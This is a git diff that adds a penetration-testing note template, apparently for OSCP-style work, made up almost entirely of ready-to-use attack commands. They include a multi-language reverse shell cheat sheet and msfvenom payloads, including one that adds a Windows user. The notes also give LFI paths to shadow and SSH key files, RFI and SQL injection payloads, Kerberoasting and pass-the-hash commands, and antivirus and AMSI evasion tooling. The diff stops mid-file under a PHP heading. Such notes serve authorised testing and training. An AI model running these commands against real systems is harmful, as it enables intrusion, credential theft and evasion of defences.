diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..d51d5fa
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,2 @@
+# Ignore Obsidian Files
+*.obsidian
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md
new file mode 100644
index 0000000..f64e09f
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md	
@@ -0,0 +1,100 @@
+# "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to"
+
+
+## tcpdump:
+
+- tcpdump -i eth0
+- tcpdump -c -i eth0
+- tcpdump -A -i eth0
+- tcpdump -w 0001.pcap -i eth0
+- tcpdump -r 0001.pcap
+- tcpdump -n -i eth0
+- tcpdump -i eth0 port 22
+- tcpdump -i eth0 -src 172.21.10.X
+- tcpdump -i eth0 -dst 172.21.10.X
+
+Other tools: 
+
+Tshark (Command Line Wireshark)
+Wireshark
+
+
+## Network Scanning
+
+NetDiscover (ARP Scanning):
+- netdiscover -i eth0
+- netdiscover -r 172.21.10.0/24
+
+Nmap:
+
+- nmap -sn 172.21.10.0/24
+- nmap -sn 172.21.10.1-253
+- nmap -sn 172.21.10.*
+
+Nbtscan: 
+- nbtscan -r 172.21.1.0/24
+
+Linux Ping Sweep (Bash)
+
+- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done
+
+Windows Ping Sweep (Run on Windows System)
+
+- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up.
+
+
+
+## Host Scanning
+
+Nmap:
+
+- nmap -sC -sV 172.21.0.0
+- nmap -sV -Pn 172.21.0.0
+- nmap -T4 -sC -sV 172.21.0.0
+- nmap -A 172.21.0.0
+
+IPv6 Scan:
+
+Nmap Scripts: 
+
+Location: /usr/share/nmap/scripts/
+
+- nmap --scripts vuln,safe,discovery -oN results.txt target-ip
+
+Scans through Socks proxy: 
+
+- nmap --proxies socks4://proxy-ip:8080 target-ip
+
+DNSRecon: 
+
+- dnsrecon -d www.example.com -a 
+- dnsrecon -d www.example.com -t axfr
+- dnsrecon -d <startIP-endIP>
+- dnsrecon -d www.example.com -D <namelist> -t brt
+
+Dig: 
+
+- dig www.example.com + short
+- dig www.example.com MX
+- dig www.example.com NS
+- dig www.example.com> SOA
+- dig www.example.com ANY +noall +answer
+- dig -x www.example.com
+- dig -4 www.example.com (For IPv4)
+- dig -6 www.example.com (For IPv6)
+- dig www.example.com mx +noall +answer example.com ns +noall +answer
+- dig -t AXFR www.example.com
+
+Sublis3r:
+
+- Sublist3r -d www.example.com
+- Sublist3r -v -d www.example.com -p 80,443
+
+OWASP AMASS: 
+
+- amass enum -d www.example.com
+- amass intel -whois -d www.example.com
+- amass intel -active 172.21.0.0-64 -p 80,443,8080,8443
+- amass intel -ipv4 -whois -d www.example.com
+- amass intel -ipv6 -whois -d www.example.com
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md
new file mode 100644
index 0000000..9aaf438
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md	
@@ -0,0 +1,6 @@
+# Fill in results or other information about your target here: 
+
+
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md
new file mode 100644
index 0000000..ed34651
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md	
@@ -0,0 +1,6 @@
+# When in Doubt...Always Enumerate! Enumeration is the key!
+
+
+
+## Resources
+- http://www.0daysecurity.com/penetration-testing/enumeration.html
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md
new file mode 100644
index 0000000..cdcb8b7
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md	
@@ -0,0 +1,12 @@
+## In Kali
+
+apt install impacket-scripts
+
+## Github
+
+https://github.com/SecureAuthCorp/impacket
+
+## Local Locations:
+
+/usr/share/doc/python3-impacket/examples
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket Kerberoasting.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket Kerberoasting.md
new file mode 100644
index 0000000..f12888f
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket Kerberoasting.md	
@@ -0,0 +1,24 @@
+## Check for Kerberoasting: 
+
+- GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john
+
+## GetUserSPNs
+
+ASREPRoast:
+- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
+- impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
+
+Kerberoasting: 
+- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> 
+
+Overpass The Hash/Pass The Key (PTK):
+- python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
+- python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
+- python3 getTGT.py <domain_name>/<user_name>:[password]
+
+## Using TGT key to excute remote commands from the following impacket scripts:
+
+- python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+- python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+- python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md
new file mode 100644
index 0000000..48c6d82
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md	
@@ -0,0 +1,23 @@
+Cannot use in the OSCP Exam. Fun to use on assessments.
+Note: Multirelay.py does not work in python3 since the UserDict library has been depricated
+
+
+# Source: https://github.com/lgandx/Responder
+
+## Make changes to config to turn off services:
+
+nano /usr/share/responder/Responder.conf
+
+## Starting Responder:
+
+- responder -I [Interface] -A
+- responder -I [Interface] -i [IP Address] or -e [External IP] -A
+
+## Tools in Responder: 
+
+Location: /usr/share/Responder/tools
+
+## Check for systems with SMB Signing not enabled
+
+- python3 RunFinger.py -i 172.21.0.0/24
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md
new file mode 100644
index 0000000..126fa59
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md	
@@ -0,0 +1,102 @@
+
+## Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!
+
+
+## Web App Scanners
+
+Nikto: 
+
+- nikto --url <domain>
+
+Wpscan:
+
+- wpscan --url <domain>
+- wpscan --url <domain> --enumerate ap at (All Plugins, All Themes)
+- wpscan --url <domain> --enumerate u (Usernames)
+- wpscan --url <domain> --enumerate v
+
+Web Tools for Directory Scanning: 
+
+Dirb: 
+
+- dirb <domain>
+- dirb <domain> <wordlist>
+
+Gobuster: 
+
+- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file>
+- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -a Firefox (Custom Agent)
+- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html
+- gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" -o output.txt
+- gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
+
+Wfuzz:
+
+- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
+- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
+- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ"  --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)
+
+- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)
+
+Dirsearch: 
+
+- dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php
+
+
+Other Tools: 
+- Burp Suite
+- OWASP Zap
+- Cadaver
+- SQLMap
+- Joomscan
+
+
+## Testing for LFI: 
+
+https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf
+
+Examples: 
+
+http://example.com/index.php?page=etc/passwd
+http://example.com/index.php?page=etc/passwd%00
+http://example.com/index.php?page=../../etc/passwd
+http://example.com/index.php?page=%252e%252e%252f
+http://example.com/index.php?page=....//....//etc/passwd
+
+Interesting Files:
+
+Linux:
+/etc/passwd
+/etc/shadow
+/etc/issue
+/etc/group
+/etc/hostname
+/etc/ssh/ssh_config
+/etc/ssh/sshd_config
+/root/.ssh/id_rsa
+/root/.ssh/authorized_keys
+/home/user/.ssh/authorized_keys
+/home/user/.ssh/id_rsa
+
+Windows:
+
+Windows:
+/boot.ini
+/autoexec.bat
+/windows/system32/drivers/etc/hosts
+/windows/repair/SAM
+
+
+
+## Testing for RFI: 
+
+http://example.com/index.php?page=http://callback.com/shell.txt
+http://example.com/index.php?page=http://callback.com/shell.txt%00
+http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt
+
+## Resources
+
+- Turning LFI to RFI: https://l.avala.mp/?p=241
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md
new file mode 100644
index 0000000..cc7d1db
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md	
@@ -0,0 +1,25 @@
+Testing for Bypasses: 
+
+' or 1=1 LIMIT 1 --
+' or 1=1 LIMIT 1 -- -
+' or 1=1 LIMIT 1#
+'or 1#
+' or 1=1 --
+' or 1=1 -- -
+
+# SQLMAP
+
+## sqlmap crawl  
+sqlmap -u http://172.21.0.0 --crawl=1
+
+## sqlmap dump database  
+sqlmap -u http://172.21.0.0 --dbms=mysql --dump
+
+## sqlmap shell  
+sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell
+
+# SQLI
+
+Testing for a row: 
+
+- http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md
new file mode 100644
index 0000000..ffc452e
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/General Notes.md	
@@ -0,0 +1,63 @@
+
+## Enumerate SMB:
+
+Enum4linux:
+
+- Enum4linux -a 172.21.0.0
+
+SMBmap:
+
+- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
+- smbmap -H 172.21.0.0 -d [domain] -u "" -p ""
+
+Nmap: 
+
+- nmap --script smb-* -p 139,445, 172.21.0.0
+- nmap --script smb-enum-* -p 139,445, 172.21.0.0
+
+/usr/share/nmap/scripts/smb-brute.nse
+/usr/share/nmap/scripts/smb-enum-domains.nse
+/usr/share/nmap/scripts/smb-enum-groups.nse
+/usr/share/nmap/scripts/smb-enum-processes.nse
+/usr/share/nmap/scripts/smb-enum-services.nse
+/usr/share/nmap/scripts/smb-enum-sessions.nse
+/usr/share/nmap/scripts/smb-enum-shares.nse
+/usr/share/nmap/scripts/smb-enum-users.nse
+/usr/share/nmap/scripts/smb-flood.nse
+/usr/share/nmap/scripts/smb-ls.nse
+/usr/share/nmap/scripts/smb-mbenum.nse
+/usr/share/nmap/scripts/smb-os-discovery.nse
+/usr/share/nmap/scripts/smb-print-text.nse
+/usr/share/nmap/scripts/smb-protocols.nse
+/usr/share/nmap/scripts/smb-psexec.nse
+/usr/share/nmap/scripts/smb-security-mode.nse
+/usr/share/nmap/scripts/smb-server-stats.nse
+/usr/share/nmap/scripts/smb-system-info.nse
+
+
+SMBClient: 
+
+- smbclient -L 172.21.0.0
+- smbclient //172.21.0.0/tmp
+
+Impacket SmbClient: 
+
+- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0
+
+RPCclient: 
+
+- rpcclient -U "" -N 172.21.0.0 enumdomusers
+
+Impacket: 
+
+- python3 samdump.py SMB 172.21.0.0
+
+CrackMapExec: 
+
+- crackmapexec smb -L 
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share
+- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz
+
+ 
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md
new file mode 100644
index 0000000..820d180
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/General Notes.md	
@@ -0,0 +1,24 @@
+# Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 
+
+
+Anonymous Credential LDAP Dumping: 
+
+- ldapsearch -LLL -x -H ldap://<domain fqdn> -b ‘’ -s base ‘(objectclass=*)’
+
+Impacket GetADUsers.py (Must have valid credentials)
+
+- GetADUsers.py -all <domain\User> -dc-ip <DC_IP>
+
+Impacket lookupsid.py:
+
+- /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0
+
+Windapsearch:
+
+https://github.com/ropnop/windapsearch 
+
+- python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
+
+## References: 
+
+- PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/General Notes.md
new file mode 100644
index 0000000..5ba634a
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/General Notes.md	
@@ -0,0 +1,57 @@
+SNMP Walk: 
+
+
+- snmpwalk -c public -v1 ipaddress 1
+- snmpwalk -c private -v1 ipaddress 1
+- snmpwalk -c manager -v1 ipaddress 1
+
+
+Nmap: 
+
+- nmap 172.21.0.0 -Pn -sU -p 161 --script=
+
+/usr/share/nmap/scripts/snmp-brute.nse
+/usr/share/nmap/scripts/snmp-hh3c-logins.nse
+/usr/share/nmap/scripts/snmp-info.nse
+/usr/share/nmap/scripts/snmp-interfaces.nse
+/usr/share/nmap/scripts/snmp-ios-config.nse
+/usr/share/nmap/scripts/snmp-netstat.nse
+/usr/share/nmap/scripts/snmp-processes.nse
+/usr/share/nmap/scripts/snmp-sysdescr.nse
+/usr/share/nmap/scripts/snmp-win32-services.nse
+/usr/share/nmap/scripts/snmp-win32-shares.nse
+/usr/share/nmap/scripts/snmp-win32-software.nse
+/usr/share/nmap/scripts/snmp-win32-users.nse
+
+Metasploit aux modules: 
+
+ auxiliary/scanner/misc/oki_scanner                                    
+ auxiliary/scanner/snmp/aix_version                                   
+ auxiliary/scanner/snmp/arris_dg950                                   
+ auxiliary/scanner/snmp/brocade_enumhash                               
+ auxiliary/scanner/snmp/cisco_config_tftp                               
+ auxiliary/scanner/snmp/cisco_upload_file                              
+ auxiliary/scanner/snmp/cnpilot_r_snmp_loot                             
+ auxiliary/scanner/snmp/epmp1000_snmp_loot                             
+ auxiliary/scanner/snmp/netopia_enum                                    
+ auxiliary/scanner/snmp/sbg6580_enum                                 
+ auxiliary/scanner/snmp/snmp_enum                                 
+ auxiliary/scanner/snmp/snmp_enum_hp_laserjet                           
+ auxiliary/scanner/snmp/snmp_enumshares                                
+ auxiliary/scanner/snmp/snmp_enumusers                                 
+ auxiliary/scanner/snmp/snmp_login                                     
+
+
+Onesixtyone: 
+
+- onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X
+
+Snmp-check
+
+
+- snmp-check 172.21.0.0 -c public
+
+
+Impacket: 
+
+- python3 samdump.py SNMP 172.21.0.0
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/5. TCP/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/5. TCP/Target _1.md
new file mode 100644
index 0000000..9aaf438
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/5. TCP/Target _1.md	
@@ -0,0 +1,6 @@
+# Fill in results or other information about your target here: 
+
+
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/6. UDP/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/6. UDP/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/6. UDP/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/7. Other/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/7. Other/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/7. Other/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/1. General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/1. General Notes.md
new file mode 100644
index 0000000..689467c
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/1. General Notes.md	
@@ -0,0 +1,77 @@
+## Pre-requisites for runninging exploits
+
+- Check the version of the operating system.
+- Check the software version.
+- Check if there is exploit for it (Searchsploit, ExploitDB, Google, etc).
+- If you have an exploit, is there a Metasploit Module for it?
+
+
+## Default Credentials
+
+- https://cirt.net/passwords
+- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
+
+## Reverse Shells
+
+Bash: 
+
+- bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1
+
+Perl:
+
+```
+perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+```
+
+Python: 
+
+- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+IPv6: 
+
+- python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 
+
+Ruby:
+
+- ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
+- ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+
+
+PHP:
+
+Pentest Monkey Reverse Shell for PHP:
+In Kali: 
+
+/usr/share/webshells/php/php-reverse-shell.php
+
+Link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
+
+- php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
+
+Powershell: 
+
+```
+$callback = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$callback.Close()
+```
+
+Golang: 
+
+- echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
+
+AWK: 
+
+- awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
+
+
+Other Reverse Shell: 
+https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
+
+
+## Other Resources 
+
+- Amsi-Bypass-Powershell: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 
+
+
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypass Windows Amsi.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypass Windows Amsi.md
new file mode 100644
index 0000000..4c66979
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypass Windows Amsi.md	
@@ -0,0 +1,14 @@
+## Testing for Amsi Bypass:
+
+- https://github.com/rasta-mouse/AmsiScanBufferBypass
+
+## Amsi-Bypass-Powershell
+
+- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
+
+## Resources:
+
+- https://blog.f-secure.com/hunting-for-amsi-bypasses/
+- https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+- https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
+- https://slaeryan.github.io/posts/falcon-zero-alpha.html
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypassing AV.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypassing AV.md
new file mode 100644
index 0000000..b773a87
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypassing AV.md	
@@ -0,0 +1,39 @@
+## Veil Framework:
+
+Install on Kali: 
+- apt install veil
+- /usr/share/veil/config/setup.sh --force --silent
+
+Reference: https://github.com/Veil-Framework/Veil
+
+## Shellter
+
+Source: https://www.shellterproject.com/download/
+
+- apt install shellter
+
+
+## Sharpshooter
+
+Javascript Payload Stageless: 
+- SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
+
+Stageless HTA Payload: 
+
+- SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
+
+Staged VBS:
+
+- SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
+
+Reference: https://github.com/mdsecactivebreach/SharpShooter
+
+## Donut: 
+
+Source: https://github.com/TheWover/donut
+
+## Vulcan
+
+Source: https://github.com/praetorian-code/vulcan
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Msfvenom.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Msfvenom.md
new file mode 100644
index 0000000..f758318
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Msfvenom.md	
@@ -0,0 +1,86 @@
+## Creating a payload
+
+- msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]
+
+To view list of payloads: msfvenom -l payloads
+To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options
+
+## Creating a payload with encoding
+
+- msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] <var=value> > outputfile
+
+## Creating a payload using a template
+
+- msfvenom -p [payload] <var=value> -x [template] -f [formattype] > outputfile
+
+## Listening for MSfvenom Payloads:
+
+```
+msf5>use exploit/multi/handler  
+msf5>set payload windows/meterpreter/reverse_tcp  
+msf5>set lhost <IP>  
+msf5>set lport <PORT>  
+msf5> set ExitOnSession false  
+msf5>exploit -j  
+```
+
+## Windows Payloads
+
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe	
+- msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe	
+- msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe	
+- msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe	
+- msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
+
+## Linux Payloads
+
+- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf	
+- msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf	
+- msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf	
+- msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
+
+Add a user in windows with msfvenom: 
+
+- msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe
+
+## Web Payloads
+
+PHP
+
